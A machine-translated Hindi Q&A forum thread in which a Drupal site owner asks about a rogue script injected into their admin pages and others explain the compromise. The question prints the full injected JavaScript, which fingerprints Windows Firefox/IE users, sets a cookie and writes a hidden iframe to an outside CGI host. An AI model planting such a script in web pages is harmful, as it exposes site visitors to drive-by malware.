2012-04-20 11 views
6

संभव डुप्लिकेट:
Weird Script Appearing In My Website's DOMड्रापल वेबसाइट पर "103fm" स्क्रिप्ट क्यों दिखाई दे रही है?

मैं सिर्फ एक अजीब स्क्रिप्ट मेरी वेबसाइटों डोम में चल देखा। मैं ड्रोपल चला रहा हूँ। लिपि http://www.103fm.net/release.js है। मुझे नहीं पता कि इस दुष्ट लिपि को ढूंढना शुरू करना कहां से शुरू करना है। मेरी वेबसाइट miloads.com है और यह केवल व्यवस्थापक मेनू में होती है। अजीब बात यह है कि फ़ाइल 103fm.net पर मौजूद नहीं है, लेकिन यह वास्तव में निम्न स्क्रिप्ट को लोड करता है:

var BrowserDetect = { 
init: function() { 
this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; 
this.OS = this.searchString(this.dataOS) || "an unknown OS"; 
}, 
searchString: function(data) { 
for (var i = 0; i < data.length; i++) { 
var dataString = data[i].string; 
var dataProp = data[i].prop; 
this.versionSearchString = data[i].versionSearch || data[i].identity; 
if (dataString) { 
if (dataString.indexOf(data[i].subString) != -1) 
return data[i].identity; 
} else if (dataProp) 
return data[i].identity; 
} 
}, 
searchVersion: function(dataString) { 
var index = dataString.indexOf(this.versionSearchString); 
if (index == -1) 
return; 
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1)); 
}, 
dataBrowser: [{ 
string: navigator.userAgent, 
subString: "Firefox", 
identity: "Firefox" 
}, { 
string: navigator.userAgent, 
subString: "MSIE", 
identity: "Explorer", 
versionSearch: "MSIE" 
}], 
dataOS: [{ 
string: navigator.platform, 
subString: "Win", 
identity: "Windows" 
}] 
}; 
function addCookie(szName, szValue, dtDaysExpires) { 
var dtExpires = new Date(); 
var dtExpiryDate = ""; 
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000); 
dtExpiryDate = dtExpires.toGMTString(); 
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate; 
} 
function findCookie(szName) { 
var i = 0; 
var nStartPosition = 0; 
var nEndPosition = 0; 
var szCookieString = document.cookie; 
while (i <= szCookieString.length) { 
nStartPosition = i; 
nEndPosition = nStartPosition + szName.length; 
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) { 
nStartPosition = nEndPosition + 1; 
nEndPosition = document.cookie.indexOf(";", nStartPosition); 
if (nEndPosition < nStartPosition) 
nEndPosition = document.cookie.length; 
return document.cookie.substring(nStartPosition, nEndPosition); 
break; 
} 
i++; 
} 
return ""; 
} 
BrowserDetect.init(); 
var szCookieString = document.cookie; 
var stopit = BrowserDetect.browser; 
var os = BrowserDetect.OS; 
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) { 
addCookie("geo_id2", "753445", 1); 
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>"); 
} else {} 
+4

मेरा दूसरा प्रश्न बंद कर दिया गया था इसलिए मैंने अधिक जानकारी के साथ एक नया बनाया। –

+0

स्क्रिप्ट वास्तव में आपके क्लाइंट के ब्राउज़र पर एक भूत कुकी लिख रही है (यही कारण है कि मैंने अभी तक अपनी वेबसाइट नहीं खोली है) और इसे 'document.write' कॉल' के साथ अपने डेटाबेस में भेज दिया है। – hjpotter92

+0

बंद प्रश्न में कुछ सलाह सार्थक है। एक अच्छा टेक्स्ट सर्च प्रोग्राम प्राप्त करें (या शायद 'grep' का उपयोग करें) और स्क्रिप्ट के लिए खोजें। इस बीच, सुनिश्चित करें कि आपने अपने सभी पासवर्ड बदल दिए हैं: यदि आपने उस स्क्रिप्ट को नहीं जोड़ा है - एक दुष्ट प्लगइन स्थापित करके, उदाहरण के लिए - तो किसी और के पास है। –

उत्तर

1

इसी तरह, हमारे ग्राहक के सर्वर रोमानिया, चेक गणराज्य और पोलैंड में आईपी पते से कल रात छेड़खानी की गई थी । ये प्रतीत होता है स्वचालित प्रक्रियाएं शरीर टैग के शीर्ष पर एक स्क्रिप्ट टैग इंजेक्ट करने लगती हैं। यह स्क्रिप्ट फ़ायरफ़ॉक्स और आईई चलाने वाली विंडोज मशीनों पर एक कुकी उत्पन्न करने के लिए प्रतीत होता है। इसके बाद यह एक आईफ्रेम खुलता है और रूस में होस्ट की गई साइट पर चल रही एक सीजीआई स्क्रिप्ट चलाता है।

सौभाग्य से, फ़ायरफ़ॉक्स का नवीनतम संस्करण स्क्रिप्ट को भी लोड नहीं करेगा; आईई हालांकि करता है।

क्रोम (प्रभावित होने के बावजूद) आपको उस पृष्ठ पर जाने की अनुमति नहीं देगा जिस पर यह हुआ है।

जैसा कि सभी रिपोर्टें मुझे मिल सकती हैं, हाल ही में यह हुआ है, यह समझौता किए गए पासवर्ड के बजाए एक सॉफ्टवेयर व्यवहार्यता हो सकता है - आप कौन सी एफ़टीपी सर्वर चल रहे हैं (अपने एफ़टीपी क्लाइंट के साथ सर्वर से कनेक्ट करें, और कंसोल चाहिए आपको बताना)। प्रश्न में सर्वर ProFTPd 1.3.1 चल रहा है।

यदि सॉफ़्टवेयर सामान्य है, तो निर्माता को सूचित किया जाना चाहिए।

+0

मेरे पास मेजबान देखने वाला था ..... मेरे डोमेन में से हर एक इसे संक्रमित कर रहा था। मेरे पास Google द्वारा मैलवेयर के रूप में चिह्नित प्रत्येक डोमेन था। जानबूझकर वे इससे छुटकारा पाने में सक्षम थे लेकिन मैं अभी भी Google की वेबसाइटों को अन-ब्लॉक करने का इंतजार कर रहा हूं =/ –

+0

फिर से हुआ !!!!!! –

संबंधित मुद्दे

 संबंधित मुद्दे